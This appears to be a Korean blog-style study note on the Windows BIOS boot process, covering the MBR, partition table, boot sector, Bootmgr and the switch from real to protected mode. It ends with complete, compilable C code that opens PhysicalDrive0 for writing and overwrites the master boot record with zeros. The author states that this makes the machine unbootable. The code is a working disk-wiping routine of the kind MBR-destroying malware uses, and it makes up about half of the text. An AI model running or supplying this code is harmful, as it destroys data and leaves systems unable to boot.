강한 동기를 지닌 사람은 한계를 모른다

아래 사이트에서 api 함수 검색

http://www.pinvoke.net/index.aspx

부트 과정

BIOS 사전 부트

물리 디스크는 섹터 단위로 구성되며 BIOS PC에서 HDD 섹터는 일반적으로 512바이트다. 윈도우 설치 프로그램처럼 하드디스크에 볼륨을 정의하는 유틸리티는 하드디스크의 첫 섹터에 마스터 부트 레코드라는 데이터 섹터를 기록한다. 

MBR은 실행 명령(부트 코드)과 디스크상에 주 파티션 위치를 지정하는 4개의 항목을 가진 테이블(파티션 테이블)이 있는 고정된 양의 공간이다. BIOS 기반 컴퓨터가 부팅될 때 MBR 을 실행하는 첫 번째 코드는 ROM에 기록되어 있다. BIOS는 부트 장치를 선택해 장치의 MBR을 메모리로 읽어 MBR에 있는 코드에 제어를 전달한다. 

MBR은 

1. 주 파티션을 검사해 부팅할 수 있는 플래그가 들어있는 파티션을 찾는다. 

2. 최소 하나 이상의 플래그를 찾으면 플래그가 있는 파티션에서 첫 번째 섹터를 메모리로 읽고 파티션에 포함된 코드로 제어를 전달한다. 이러한 유형의 파티션을 시스템 파티션이라 하고, 시스템 파티션의 첫 섹터를 부트 섹터라고 한다. 시스템 파티션이 정의된 볼륨을 시스템 볼륨이라고 한다. 

BIOS 부트 섹터와 Bootmgr

부트 섹터 코드의 역할은 볼륨의 구조와 포맷에 관한 윈도우 정보를 얻고, 볼륨 루트 디렉터리에서 Bootmgr 파일을 읽는 것이다. 부트 섹터 코드는 Bootmgr 을 메모리로 로드한 후 Bootmgr의 진입점에 제어를 넘긴다. 

Bootmgr은 시스템이 리얼 모드라는 x86 동작 모드로 실행하는 동안 존재한다. 

리얼모드에서의 메모리 주소는 가상 주소에 대한 물리 주소 변환이 일어나지 않는다. 이는 메모리 주소를 사용하는 프로그램이 물리적인 주소로서 해석한다는 것과, 컴퓨터의 물리적 메모리에서 첫 1MB 만 접근 가능하다는 의미다. 

Bootmgr이 수행하는 첫 번째 작업은 시스템을 보호 모드로 전환하는 것이다. 이 시점에서는 가상 주소에 대한 물리 주소 변환이 발생하지 않지만 모든 32비트 메모리는 접근 가능하다.

시스템이 보호 모드로 진입한 후 Bootmgr은 물리적 메모리에 접근 가능하다. 페이징 활성화로 16MB 이하 메모리에 접근할 수 있는 충분한 페이지 테이블을 생성한 후에 Bootmgr은 페이징을 할 수 있다. 윈도우가 일반적인 동작을 수행하는 모드는 페이징을 사용할 수 있는 보호 모드다. 

MBR 을 00000000 ... 으로 초기화 시키는 코드 실행하고 컴퓨터를 다시 킬 경우 아래와 같은 창을 볼 수 있으며 부팅이 되지 않는다. 

#include <stdio.h>

#include <windows.h>

#pragma pack(1)

typedef struct _DOS_PARTITION_STRUCT {

unsigned char    IsBootable; // 부트 가능하면 0x80, 부트 불가능하면 0x00

    unsigned char    CHSOffset[3]; // CHS(Cylinder-Head-Sector)로 표현되는 실제 파티션 주소

    unsigned char    PartitionType; // 파티션 유형 (ex: FAT32=0x0C, NTFS=0x07, ...)

    unsigned char    EndCHSOffset[3]; // CHS 주소로 표현되는 파티션의 끝 지점

    unsigned long    LBAOffset; // LBA(Logical Block Addressing)로 표현되는 파티션 주소

    unsigned long    SizeInSector; // 파티션이 사용하는 섹터(LBA)의 총 개수

} DOS_PARTITION_STRUCT, *PDOS_PARTITION_STRUCT;

#pragma pack()

#define MBR_PartitionTableOffset 0x1BEL

int main(void)

{

 HANDLE hPhysicalDrive = NULL;

 LONG   highPos    = 0;

 BYTE   MasterBootRecord[512] = {0};

 DWORD  lBytesRead   = 0;

 hPhysicalDrive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);

 if(hPhysicalDrive == INVALID_HANDLE_VALUE)

 {

  printf("[!] Disk Open Error! (LastErr=0x%08lX)\n", GetLastError ());

  return 1L;

 }

 SetFilePointer(hPhysicalDrive, 0L, &highPos, FILE_BEGIN); // 사실상 이 부분은 하지 않아도 된다.

WriteFile(hPhysicalDrive, MasterBootRecord, 512, &lBytesRead, NULL);

 CloseHandle(hPhysicalDrive);

 return 0L;

}